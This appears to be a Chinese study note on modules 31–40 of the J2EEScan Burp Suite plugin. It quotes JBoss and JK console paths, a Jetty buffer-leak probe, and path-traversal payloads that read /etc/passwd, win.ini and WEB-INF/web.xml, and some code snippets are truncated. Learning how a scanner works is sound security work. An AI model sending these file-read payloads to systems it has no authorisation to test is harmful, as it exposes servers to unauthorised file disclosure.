【BurpSuite】插件开发学习之J2EEScan（下）-主动扫描(31-40)

    private static final List<String> JBOSS_jBPM_PATHS = Arrays.asList(
            "/jbpm-console/app/tasks.jsf"
    );
1
2
3

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "".getBytes()
    );
1
2
3

    private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/EJBInvokerServlet",
            "/invoker/JMXInvokerServlet"
    );   
1
2
3
4

    private static final byte[] GREP_STRING = "org.jboss.invocation.MarshalledValue".getBytes();

1
2

private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/readonly"
    );
1
2
3

    private static final byte[] GREP_STRING = "org.jboss.invocation.http.servlet.ReadOnlyAccessFilter".getBytes();

1
2

private static final List<String> JBOSS_WS = Arrays.asList(
            "/juddi/"
    );
1
2
3

 private static final byte[] GREP_STRING = ">JBoss JUDDI".getBytes();
1

 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/web-console/",
            "/jmx-console/"
    );
1
2
3
4

    private static final byte[] GREP_STRING_JMX = "HtmlAdaptor?action=displayMBeans".getBytes();
    private static final byte[] GREP_STRING_WEB = "ServerInfo.jsp\"".getBytes();
1
2

private static final List<String> JBOSS_WS = Arrays.asList(
            "/jbossws/services"
    );
1
2
3

    private static final Pattern JBOSSWS_RE = Pattern.compile("JBossWS/Services

• 1
• 2

这个会暴露所有的web服务，也属于控制台泄露，信息收集。

【37】JettyRemoteLeakage

payload

    private static final byte[] INJ_TEST = {(byte) 0};

1
2

发送一个byte
match

    private static final byte[] GREP_STRING = "400 Illegal character 0x0 in state".getBytes();

1
2

Jetty web server 远程共享缓冲区信息泄漏漏洞

原理大概是错误信息把缓冲区的东西带出来了。

【38】JKStatus

路径

    private static final List<String> JK_ENDPOINTS = Arrays.asList(
            "/jk-status",
            "/jkstatus-auth",
            "/jkstatus",
            "/jkmanager",
            "/jkmanager-auth",
            "/jdkstatus"
    );   
1
2
3
4
5
6
7
8

match

    private static final byte[] GREP_STRING = "JK Status Manager".getBytes();
1

未授权访问远程WEB 用户的一些信息

【39】LFIAbsoluteModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            ".../....///.../....///.../....///.../....///.../....///.../....///etc/passwd".getBytes(),
            ".../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd".getBytes(),
            "../../../../../../../../../../../../../../../../etc/passwd%00.html".getBytes(),
            "file:///c:/windows/win.ini".getBytes(),
            "file:///etc/passwd".getBytes(),
            "file://\\/\\/etc/passwd".getBytes(),
            "%2fetc%2fpasswd".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini%00.html".getBytes()
    );    
1
2
3
4
5
6
7
8
9
10
11

通用型的任意文件读取

【40】LFIModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            "../../../../WEB-INF/web.xml".getBytes(),
            "../../../WEB-INF/web.xml".getBytes(),
            "../../WEB-INF/web.xml".getBytes(),
            "../WEB-INF/web.xml".getBytes(),
            "%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            // Spring Webflow payloads
            "../../../WEB-INF/web.xml;x=".getBytes(),
            "../../WEB-INF/web.xml;x=".getBytes(),  
            "../WEB-INF/web.xml;x=".getBytes(),
            "WEB-INF/web.xml".getBytes(),
            ".//WEB-INF/web.xml".getBytes()
    );    
    
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

match

    private static final byte[] GREP_STRING = ".getBytes();

1
2
3

这是读web目录，通用型的任意文件读取。